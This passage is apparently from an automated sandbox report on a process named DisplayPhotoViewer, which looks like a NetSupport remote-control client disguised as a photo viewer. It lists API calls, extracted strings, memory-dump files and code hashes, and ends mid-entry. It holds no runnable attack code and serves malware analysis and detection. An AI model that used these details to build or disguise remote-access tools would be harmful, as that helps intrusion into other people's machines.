• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Enable$Window$Menu$ErrorExitItemLastMessageProcesswsprintf
• String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
• API String ID: 703148351-1557312927
• Opcode ID: 372e43ce7bd661029b86355edc3577e0955cf4d19accfe59371bcfcfec47c16d
• Instruction ID: bcc9e62fc66d09dc64712600bc0380b6abbaf16d06013bc4eb6c91f7c4a96f51
• Opcode Fuzzy Hash: 372e43ce7bd661029b86355edc3577e0955cf4d19accfe59371bcfcfec47c16d
• Instruction Fuzzy Hash: 6A213775F40626BBC314DB76CC84FDAFBA9FF84218F048268E9089B181E730A950C7D5
APIs
Strings
• Warning. IPC msg but no wnd. Waiting..., xrefs: 110257AF
• IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11025769
• Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11025817
• IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11025788
• HandleIPC ret %x, took %d ms, xrefs: 11025800
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CountTick$Sleep
• String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
• API String ID: 4250438611-314227603
• Opcode ID: 74e107e3f07557d2d0c66870b217a4b56522b7b8183e13e6b9c61828b055b6a9
• Instruction ID: 7ef877caa9fafebae06ba3a4b2a575f99f943729a98c2ff57a101144757f4536
• Opcode Fuzzy Hash: 74e107e3f07557d2d0c66870b217a4b56522b7b8183e13e6b9c61828b055b6a9
• Instruction Fuzzy Hash: 2B21B9B9E10614ABD711DF96EC84EAFB3EDEFC4368F40856AE80A93244D5317840CBB5
                                                                                                    APIs
                                                                                                    • _strncmp.LIBCMT ref: 1100943A
                                                                                                    • _strncmp.LIBCMT ref: 1100944A
                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,218EC38C), ref: 110094EB
                                                                                                    Strings
                                                                                                    • http://, xrefs: 11009435, 11009448
                                                                                                    • IsA(), xrefs: 110094A5, 110094CD
                                                                                                    • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009471
                                                                                                    • https://, xrefs: 1100942F
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 110094A0, 110094C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strncmp$FileWrite
                                                                                                    • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$http://$https://
                                                                                                    • API String ID: 1635020204-3133059256
                                                                                                    • Opcode ID: 729026f8c03125ff6a0f394f55433a18afacfa09fbb9d56bf738f323cfc26a14
                                                                                                    • Instruction ID: 9909939b757708a08b82a3d031089e7ea193e1e8b7ba7ecc91de58562d3b65db
                                                                                                    • Opcode Fuzzy Hash: 729026f8c03125ff6a0f394f55433a18afacfa09fbb9d56bf738f323cfc26a14
                                                                                                    • Instruction Fuzzy Hash: A2314B79A0061AABDB00DF99CC44FDEB7B9FB89654F018158F929A7280EB346504CBA1
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11139846
                                                                                                    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 11139858
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 11139894
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111398B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$Free$AddressErrorExitLastLoadMessageProcProcesswsprintf
                                                                                                    • String ID: ..\ctl32\util.cpp$DllGetVersion$pdwMajorVer$pdwMinorVer
                                                                                                    • API String ID: 2160193376-301070788
                                                                                                    • Opcode ID: f72487b1c34848008531afd49dcfa56d59ee60866eefa4b903fc90f0f2916868
                                                                                                    • Instruction ID: d5dfde28fed9fca4f06e2356dccac701138166a452b5a4df9309278874aacc12
                                                                                                    • Opcode Fuzzy Hash: f72487b1c34848008531afd49dcfa56d59ee60866eefa4b903fc90f0f2916868
                                                                                                    • Instruction Fuzzy Hash: B4315275B0011E9BDB00DF99E8917EEFBB4EF88719F10406EED19A3344DB3059008B91
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B580: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 1113B5F0
                                                                                                      • Part of subcall function 1113B580: RegCloseKey.ADVAPI32(?), ref: 1113B654
                                                                                                    • _memset.LIBCMT ref: 1113B6D5
                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1113B6EE
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 1113B715
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1113B727
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1113B73F
                                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 1113B74A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                    • API String ID: 4251163631-545709139
                                                                                                    • Opcode ID: b00d51b772490356f7c0ca0cb28ac987f73d25bc21e0bcfeda20ca6954cdff0a
                                                                                                    • Instruction ID: 2d4a2ecb4d16ed5d04c77fd2c988c35691fcc6a36e1a8d2ee2213ed3d985060b
                                                                                                    • Opcode Fuzzy Hash: b00d51b772490356f7c0ca0cb28ac987f73d25bc21e0bcfeda20ca6954cdff0a
                                                                                                    • Instruction Fuzzy Hash: AE310530E216258BDB12CF34C989B9AFBA4FB8432AF444175D818C33C8E7304984CB91
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,?,-00000001,?,?,?,?,?,?,?,1102C8BD,?,?,11189200), ref: 11123425
                                                                                                    • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1112343E
                                                                                                    • wsprintfA.USER32 ref: 1112348B
                                                                                                    • wsprintfA.USER32 ref: 111234A3
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111234B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Librarywsprintf$AddressFreeLoadProc
                                                                                                    • String ID: %02x$IPHLPAPI.DLL$SendARP
                                                                                                    • API String ID: 435568443-4085816232
                                                                                                    • Opcode ID: d63983c9ea1225866dbb2f5084bed46e681694d626be9cfb5e7440865b14aee3
                                                                                                    • Instruction ID: 011d8180afc1c203709bd9e3b24c43e87b462e2febb0207dce4d194347a75828
                                                                                                    • Opcode Fuzzy Hash: d63983c9ea1225866dbb2f5084bed46e681694d626be9cfb5e7440865b14aee3
                                                                                                    • Instruction Fuzzy Hash: 2621A175E001599BCB05CF96DD849EEFBB9EF8C714F114158EC14A3300E6389A45CBA1
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,10709BC7,?,Microsoft Visual C++ Runtime Library,00012010,?,10710518,?,1071220C,?,?,?,Runtime Error!Program: ), ref: 1070CCA1
                                                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 1070CCB9
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 1070CCCA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 1070CCD7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                    • API String ID: 2238633743-4044615076
                                                                                                    • Opcode ID: 81cf9ab2e73bd2ae6b72a4f84118d75c389a51081046dfb8714da5999557d4f4
                                                                                                    • Instruction ID: 9cbd5ccaeb7f48cd027657441307522b1a2e84fe51959450810816aedbd6c2f4
                                                                                                    • Opcode Fuzzy Hash: 81cf9ab2e73bd2ae6b72a4f84118d75c389a51081046dfb8714da5999557d4f4
                                                                                                    • Instruction Fuzzy Hash: 0A01B135B00365EBD7018FB5CCC095B3BF8EB4D6817144529F504DA2A0DBB0C9499BB0
                                                                                                    APIs
                                                                                                    • CompareStringW.KERNEL32(00000000,00000000,10710274,00000001,10710274,00000001,00000000,0B8A11CC,?), ref: 1070EB58
                                                                                                    • CompareStringA.KERNEL32(00000000,00000000,10710270,00000001,10710270,00000001), ref: 1070EB75
                                                                                                    • CompareStringA.KERNEL32(?,?,00000000,?,?,?,00000000,0B8A11CC,?), ref: 1070EBD3
                                                                                                    • GetCPInfo.KERNEL32(?,00000000,00000000,0B8A11CC,?), ref: 1070EC24
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000), ref: 1070ECA3
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?), ref: 1070ED04
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 1070ED17
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 1070ED63
                                                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 1070ED7B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharCompareMultiStringWide$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 1651298574-0
                                                                                                    • Opcode ID: aa89c38a96ad7143802d2ee4043634e062d8d2e224aa4c43372f55d18a1d06df
                                                                                                    • Instruction ID: b46dbd8519462bf83e24de8df201a28ac7dbc380f27016f5bec8adbf6d4394c7
                                                                                                    • Opcode Fuzzy Hash: aa89c38a96ad7143802d2ee4043634e062d8d2e224aa4c43372f55d18a1d06df
                                                                                                    • Instruction Fuzzy Hash: 53719172A0025AEFDF119F50CC85ADF7FFAEB0A750F114A2AF951A6164D3328851DBA0
APIs
• LCMapStringW.KERNEL32(00000000,00000100,10710274,00000001,00000000,00000000,74DEE860,10723E48,?,00000003,00000000,00000001,00000000,?,?,10704A40), ref: 10708283
• LCMapStringA.KERNEL32(00000000,00000100,10710270,00000001,00000000,00000000,?,?,10704A40,?), ref: 1070829F
• LCMapStringA.KERNEL32(?,?,00000000,00000001,00000000,00000003,74DEE860,10723E48,?,00000003,00000000,00000001,00000000,?,?,10704A40), ref: 107082E8
• MultiByteToWideChar.KERNEL32(?,10723E49,00000000,00000001,00000000,00000000,74DEE860,10723E48,?,00000003,00000000,00000001,00000000,?,?,10704A40), ref: 10708320
• MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,?,00000000), ref: 10708378
• LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 1070838E
• LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 107083C1
• LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 10708429
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: String$ByteCharMultiWide
• String ID:
• API String ID: 352835431-0
• Opcode ID: b96e9807655d678c8ff4b095eb4075a532090212609265f3cce4253ceed5fbc0
• Instruction ID: 218e984178609d7a5ddc3d520bc6d708beb4a4275da23bb3dbe217fcc32717c9
• Opcode Fuzzy Hash: b96e9807655d678c8ff4b095eb4075a532090212609265f3cce4253ceed5fbc0
• Instruction Fuzzy Hash: EC518F3150024AEFCF528F95CC85ADFBFB9FB8AB90F108219F954A11A4D7728D50DBA4
APIs
• GetWindowRect.USER32(?,?), ref: 11111337
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 11111349
• GetSystemMetrics.USER32(00000002), ref: 11111357
• GetSystemMetrics.USER32(00000003), ref: 1111136F
• GetSystemMetrics.USER32(0000004E), ref: 111113BE
• GetSystemMetrics.USER32(0000004F), ref: 111113C8
• GetSystemMetrics.USER32(00000000), ref: 111113DB
• GetSystemMetrics.USER32(00000001), ref: 111113EE
• GetWindowRect.USER32(?,?), ref: 1111145B
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004C), ref: 11090E7E
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004D), ref: 11090E87
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004E), ref: 11090E8E
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000000), ref: 11090E97
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004F), ref: 11090E9D
  • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000001), ref: 11090EA5
  • Part of subcall function 11090E00: _memset.LIBCMT ref: 11090E2F
  • Part of subcall function 11090E00: FreeLibrary.KERNEL32(00000000,?,75C04920,111114D7,00000002), ref: 11090E3A
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: MetricsSystem$Window$Rect$FreeLibraryPoints_memset
• String ID:
• API String ID: 314733930-0
• Opcode ID: 034b7ce4c3f93dcdb5c861d8618fa725daa4a9f12a8ab3782a76fd2ba96d55ce
• Instruction ID: 7b05305e9799a146fa0c52095186d33d1ccf680bff87c03a50374dcfc8c3d40a
• Opcode Fuzzy Hash: 034b7ce4c3f93dcdb5c861d8618fa725daa4a9f12a8ab3782a76fd2ba96d55ce
• Instruction Fuzzy Hash: 42611875E0061A9FCB14CF68C984BEDF7F5FB48704F0046AAD919A7684DB70AA81CF90
APIs
• OpenPrinterA.WINSPOOL.DRV(?,?,00000000,00000000), ref: 1106158F
• GetLastError.KERNEL32(?,?,00000000,00000000), ref: 11061598
• GetPrinterA.WINSPOOL.DRV(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 1106160C
• GetLastError.KERNEL32(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 11061615
• _malloc.LIBCMT ref: 11061629
  • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
  • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
  • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
• GetPrinterA.WINSPOOL.DRV(?,00000002,00000000,?,?,00000000,?), ref: 11061649
• _free.LIBCMT ref: 11061662
• GetLastError.KERNEL32(?,00000002,00000000,00000000,?,?,?,00000000,00000000), ref: 1106166C
• ClosePrinter.WINSPOOL.DRV(?), ref: 11061679
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ErrorLastPrinter$AllocateCloseHeapOpenPrinter._free_malloc
• String ID:
• API String ID: 2468972630-0
• Opcode ID: d1b1e68c699c4f3f96c0dfa89df70855db5279da2695fee380a5fca8f14e12bd
• Instruction ID: 6c079ffdbf9b044437703f4a85509ce99a6c39382adaa8f3e776f3d339d321d6
• Opcode Fuzzy Hash: d1b1e68c699c4f3f96c0dfa89df70855db5279da2695fee380a5fca8f14e12bd
• Instruction Fuzzy Hash: 01312CB9D003599BDB60DFA49C8499EF7BC9B45308F1445E8F919D7101EA34AE48CB91
APIs
  • Part of subcall function 11107A40: GetCurrentThreadId.KERNEL32 ref: 11107A4E
  • Part of subcall function 11107A40: EnterCriticalSection.KERNEL32(00000000,75BF3760,00000000,111E4128,?,110C7265,00000000,75BF3760), ref: 11107A58
  • Part of subcall function 11107A40: LeaveCriticalSection.KERNEL32(00000000,75C0A1D0,00000000,?,110C7265,00000000,75BF3760), ref: 11107A78
• EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,11059DFB,?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C726B
• SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C7298
• SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C72AA
• LeaveCriticalSection.KERNEL32(?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72B4
• IsDialogMessageA.USER32(00000000,?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72CB
• LeaveCriticalSection.KERNEL32(00000000,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72E1
• DestroyWindow.USER32(00000000,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72F1
• LeaveCriticalSection.KERNEL32(?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72FB
• LeaveCriticalSection.KERNEL32(?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C7311
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
